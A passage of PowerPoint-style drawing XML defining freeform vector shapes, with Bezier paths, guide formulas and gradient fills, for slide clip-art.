                      <a:pt x="234" y="277"/>
                      <a:pt x="247" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="260"/>
                      <a:pt x="267" y="108"/>
                      <a:pt x="247" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="240" y="56"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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8" name="Freeform 1700">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C08E0C-8714-490E-8B80-685BD7748F9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17" y="-3620"/>
                <a:ext cx="489" cy="527"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 489"/>
                  <a:gd name="T1" fmla="*/ 0 h 527"/>
                  <a:gd name="T2" fmla="*/ 0 w 489"/>
                  <a:gd name="T3" fmla="*/ 397 h 527"/>
                  <a:gd name="T4" fmla="*/ 489 w 489"/>
                  <a:gd name="T5" fmla="*/ 527 h 527"/>
                  <a:gd name="T6" fmla="*/ 489 w 489"/>
                  <a:gd name="T7" fmla="*/ 130 h 527"/>
                  <a:gd name="T8" fmla="*/ 0 w 489"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="527">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="13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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="70588"/>
                      <a:invGamma/>
                    </a:srgbClr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9" name="Freeform 1701">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FD1D98-0B4D-41B4-AC1E-06A55C02B03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87" y="-3681"/>
                <a:ext cx="640" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 271"/>
                  <a:gd name="T1" fmla="*/ 14 h 73"/>
                  <a:gd name="T2" fmla="*/ 41 w 271"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 271"/>
                  <a:gd name="T5" fmla="*/ 8 h 73"/>
                  <a:gd name="T6" fmla="*/ 233 w 271"/>
                  <a:gd name="T7" fmla="*/ 70 h 73"/>
                  <a:gd name="T8" fmla="*/ 265 w 271"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 100 w 271"/>
                  <a:gd name="T11" fmla="*/ 1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1" h="73">
                    <a:moveTo>
                      <a:pt x="100" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="48" y="4"/>
                      <a:pt x="41" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="4"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="222" y="60"/>
                      <a:pt x="233" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="73"/>
                      <a:pt x="271" y="69"/>
                      <a:pt x="265" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="59"/>
                      <a:pt x="161" y="29"/>
                      <a:pt x="100" y="1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0" name="Freeform 1702">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC64A72-5919-46BB-9BFD-EA4DA169798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76" y="-3154"/>
                <a:ext cx="660" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 660"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 660"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 660 w 660"/>
                  <a:gd name="T5" fmla="*/ 120 h 175"/>
                  <a:gd name="T6" fmla="*/ 452 w 660"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 660"/>
                  <a:gd name="T9" fmla="*/ 52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0" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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1" name="Freeform 1703">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF4BE8B-B6AA-4580-9017-F58DB53F208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28" y="-3034"/>
                <a:ext cx="198" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 55 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 198"/>
                  <a:gd name="T3" fmla="*/ 88 h 88"/>
                  <a:gd name="T4" fmla="*/ 198 w 198"/>
                  <a:gd name="T5" fmla="*/ 36 h 88"/>
                  <a:gd name="T6" fmla="*/ 198 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 5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88">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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2" name="Freeform 1704">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE4EEAB-C2A3-4178-B090-FCAE5BD6631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76" y="-3102"/>
                <a:ext cx="452" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 35 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T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2" h="156">
                    <a:moveTo>
                      <a:pt x="452" y="156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452" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="15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3" name="Freeform 1705">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED502B7-8750-409F-8789-BCA4A8CAAF5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38" y="-3140"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 38 h 139"/>
                  <a:gd name="T2" fmla="*/ 383 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 104 h 139"/>
                  <a:gd name="T6" fmla="*/ 135 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 3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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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628" name="Line 1724">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B33BE6-A49F-475D-9A21-14411522D56D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3883605" y="3522137"/>
              <a:ext cx="0" cy="1333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629" name="Group 1787">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68CFD86-A244-470B-BB27-190E8E89E0B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300470" y="3108278"/>
              <a:ext cx="229620" cy="357022"/>
              <a:chOff x="2363" y="1132"/>
              <a:chExt cx="343" cy="529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1071" name="Freeform 1788">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5235A1-E844-4A46-80A0-A0E31F24D7C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74" y="1449"/>
                <a:ext cx="145" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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2" name="Freeform 1789">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF97585-0115-4F01-A425-189972570A6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18" y="1435"/>
                <a:ext cx="267" cy="226"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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3" name="Freeform 1790">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B37BA880-0BB5-4E08-AB81-FF493721B20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63" y="1229"/>
                <a:ext cx="343" cy="269"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
